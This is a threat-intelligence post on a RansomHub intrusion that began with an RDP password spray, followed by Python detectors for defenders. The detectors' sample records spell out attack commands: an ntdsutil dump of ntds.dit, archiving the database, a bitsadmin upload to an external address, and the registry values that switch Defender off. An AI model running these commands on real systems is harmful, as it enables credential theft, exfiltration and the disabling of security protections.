Concise Cyber

RansomHub Deployed After RDP Password Spray Attack Bypasses Security

A recent cyber incident demonstrated how a publicly exposed Remote Desktop Protocol (RDP) service led to the deployment of RansomHub ransomware across a network. The threat actor initiated the attack by conducting a password spray against an internet-facing RDP server, successfully compromising a user account that was protected by a weak password.

The entire intrusion, from initial access to ransomware deployment, took roughly two days. The case is notable for how little custom tooling it required: the attack chain was assembled almost entirely from built-in Windows administration utilities and freely available software, which is exactly the kind of activity that blends into normal administrative noise unless it is correlated.
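The initial-access pattern above, a spray across many account names from one source followed by a single success, is detectable in the Windows Security log. The following is an added illustration, not code from the original post or from the incident: it runs a sliding-window detector over constructed 4625 (failed logon) and 4624 (successful logon) records and ties any later success from the spraying source back to the spray. The event tuples, the IP addresses, the account names, and the window and threshold values are all assumptions chosen for the example.

```python
"""Password-spray detection over Windows Security log events.

The spray signature is many distinct account names failing from one source
address within a short window, followed by a success from the same source.
All events below are constructed for this example; none come from the incident.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# (timestamp, event_id, target_user, source_ip). 4625 = failed logon, 4624 = success.
# Note: when the RDP host enforces NLA, failed attempts are recorded as 4625 with
# logon type 3 rather than 10, so the detector keys on source address, not logon type.
SAMPLE_EVENTS = [
    ("2024-05-01T02:00:01", 4625, "alice", "203.0.113.7"),
    ("2024-05-01T02:00:06", 4625, "bob", "203.0.113.7"),
    ("2024-05-01T02:00:11", 4625, "carol", "203.0.113.7"),
    ("2024-05-01T02:00:17", 4625, "dave", "203.0.113.7"),
    ("2024-05-01T02:00:22", 4625, "erin", "203.0.113.7"),
    ("2024-05-01T02:00:28", 4625, "frank", "203.0.113.7"),
    ("2024-05-01T02:45:10", 4625, "grace", "203.0.113.7"),
    ("2024-05-01T02:45:15", 4624, "frank", "203.0.113.7"),  # a later pass lands on a weak password
    # A legitimate user mistyping: one account, one source, then success. Not a spray.
    ("2024-05-01T08:10:00", 4625, "alice", "10.0.5.23"),
    ("2024-05-01T08:10:09", 4625, "alice", "10.0.5.23"),
    ("2024-05-01T08:10:20", 4624, "alice", "10.0.5.23"),
]


def detect_password_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return one finding per source IP that failed against >= min_users distinct
    accounts inside any `window`, listing accounts that later succeeded from that IP."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, event_id, user, ip in events:
        bucket = failures if event_id == 4625 else successes if event_id == 4624 else None
        if bucket is not None:
            bucket[ip].append((datetime.fromisoformat(ts), user.lower()))

    findings = []
    for ip, attempts in failures.items():
        attempts.sort()
        start = 0
        for end, (t_end, _) in enumerate(attempts):
            while t_end - attempts[start][0] > window:  # slide the window forward
                start += 1
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) >= min_users:
                t_start = attempts[start][0]
                # Report the whole window from its first attempt, not just the
                # point at which the threshold was crossed.
                in_window = [(t, u) for t, u in attempts[start:] if t - t_start <= window]
                findings.append({
                    "source_ip": ip,
                    "first_seen": t_start.isoformat(),
                    "last_seen": in_window[-1][0].isoformat(),
                    "distinct_users": len({u for _, u in in_window}),
                    # Any success from the spraying source after the spray began is
                    # the account the attacker most likely walked in with.
                    "compromised": sorted({u for t, u in successes[ip] if t >= t_start}),
                })
                break  # one finding per source is enough
    return findings


if __name__ == "__main__":
    for finding in detect_password_spray(SAMPLE_EVENTS):
        print(finding)
```

The threshold and window are tuning knobs: a slow spray that tries one account every few hours per source will slip under a ten-minute window, so in practice the same logic is run at several window sizes, and the success correlation is what turns a noisy alert into an incident.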

Initial Access and Lateral Movement

Upon gaining initial access via RDP, the attacker immediately began reconnaissance activities. The actor used built-in Windows commands, such as net.exe, to enumerate domain users and identify members of the “domain admins” group. To map the internal network, the threat actor downloaded and ran the legitimate network scanning tool, Advanced IP Scanner.

Following the network scan, the attacker ran LaZagne, a publicly available credential harvesting tool, to dump saved credentials from the initially compromised host. Using one of the harvested credentials, the actor then moved laterally over RDP to a domain controller. Because a domain controller holds the directory database and issues authentication for the whole domain, this single hop gave the attacker high-level privileges and access to the environment's most critical infrastructure.

Data Exfiltration and Ransomware Deployment

Once on the domain controller, the threat actor focused on data theft. They used the native Windows utility ntdsutil.exe to create an Install From Media (IFM) copy of the Active Directory database (ntds.dit). An IFM export also writes out the SYSTEM registry hive alongside the database, which is what an attacker needs to decrypt the password hashes stored in ntds.dit offline. The export was compressed using 7-Zip, and for exfiltration the attacker used another standard Windows tool, bitsadmin.exe, to transfer the archive to an external server.

As a final preparatory step, the actor disabled Microsoft Defender Antivirus across the domain. This was accomplished by creating and linking a new Group Policy Object (GPO) that set the registry values which turn the security software off, so the change propagated to every domain-joined host at the next policy refresh. On the second day, the attacker executed a batch script to deploy the RansomHub ransomware payload, which encrypted files and dropped ransom notes across the victim's systems.
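Each of the steps in the two paragraphs above (the ntdsutil IFM export, the 7-Zip archive of ntds.dit, the bitsadmin transfer to an external host, and the policy-driven Defender shutdown) leaves a distinct trace in endpoint telemetry. The following is an added example, not code from the original post or from the incident: a small rule set run over constructed Sysmon-style process-creation and registry-value-set records. The hostnames, command lines, the external IP address, the internal domain suffix `corp.local`, and the benign noise records are all assumptions made for the example; the registry value names under the Windows Defender policy key are the real ones that Group Policy writes.

```python
"""Detection rules for the post-exploitation steps described above, run over
constructed endpoint telemetry. Sample records are constructed for illustration;
none are taken from the incident."""
import ipaddress
import re
from urllib.parse import urlparse

# "process" records mimic Sysmon Event ID 1 (process creation); "registry" records
# mimic Sysmon Event ID 13 (registry value set). Hosts and command lines are made up.
SAMPLE_EVENTS = [
    {"kind": "process", "host": "DC01", "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\temp\ifm" q q'},
    {"kind": "process", "host": "DC01", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a C:\temp\ifm.zip C:\temp\ifm\Active Directory\ntds.dit"},
    {"kind": "process", "host": "DC01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer exfil /upload http://203.0.113.50/ifm.zip C:\temp\ifm.zip"},
    {"kind": "registry", "host": "WS07",
     "key": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender",
     "value": "DisableAntiSpyware", "data": 1},
    # Benign noise: a backup job archiving a share, and an internal BITS download.
    {"kind": "process", "host": "FS01", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a D:\backups\share.7z \\FS01\share"},
    {"kind": "process", "host": "WS07", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer wsus http://10.0.0.5/update.cab C:\temp\update.cab"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Registry values under the Windows Defender policy key that switch protection off.
DEFENDER_KILL_SWITCHES = {"DisableAntiSpyware", "DisableRealtimeMonitoring"}


def is_internal_destination(url, internal_suffixes=(".corp.local",)):
    """True if the URL points at RFC 1918 space or at the (assumed) internal domain."""
    host = urlparse(url).hostname or ""
    try:
        return any(ipaddress.ip_address(host) in net for net in RFC1918)
    except ValueError:  # not an IP literal: judge by DNS suffix
        return host.lower().endswith(internal_suffixes)


def _is_process(e, image_re):
    return e["kind"] == "process" and re.search(image_re, e["image"], re.I) is not None


RULES = [
    # ntdsutil with an "ifm" argument is an offline copy of the directory database.
    ("ntdsutil_ifm_dump", lambda e: _is_process(e, r"\\ntdsutil\.exe$")
        and re.search(r"\bifm\b", e["cmdline"], re.I) is not None),
    # Any archiver touching ntds.dit is staging the database for theft.
    ("ntds_dit_archived", lambda e: _is_process(e, r"\\(7z|7za|rar|winrar)\.exe$")
        and "ntds.dit" in e["cmdline"].lower()),
    # bitsadmin /transfer to a non-internal destination; /upload makes it outbound.
    ("bitsadmin_external_transfer", lambda e: _is_process(e, r"\\bitsadmin\.exe$")
        and "/transfer" in e["cmdline"].lower()
        and any(not is_internal_destination(u) for u in URL_RE.findall(e["cmdline"]))),
    # A Defender kill switch written under the policy key is what a GPO produces.
    ("defender_disabled_by_policy", lambda e: e["kind"] == "registry"
        and "\\policies\\microsoft\\windows defender" in e["key"].lower()
        and e["value"] in DEFENDER_KILL_SWITCHES and e["data"] == 1),
]


def evaluate(events, rules=RULES):
    """Return a finding for every (rule, event) pair that matches."""
    findings = []
    for event in events:
        for name, predicate in rules:
            if predicate(event):
                detail = event.get("cmdline") or f'{event["key"]}\\{event["value"]} = {event["data"]}'
                findings.append({"rule": name, "host": event["host"], "detail": detail})
    return findings


if __name__ == "__main__":
    for finding in evaluate(SAMPLE_EVENTS):
        print(f'[{finding["rule"]}] {finding["host"]}: {finding["detail"]}')
```

The value of the rules is in their combination: any one of them on its own can fire during legitimate administration (IFM exports are how new domain controllers are staged, and BITS is used by patch management), but ntdsutil followed by an archiver and an outbound bitsadmin job on the same domain controller is not a maintenance window.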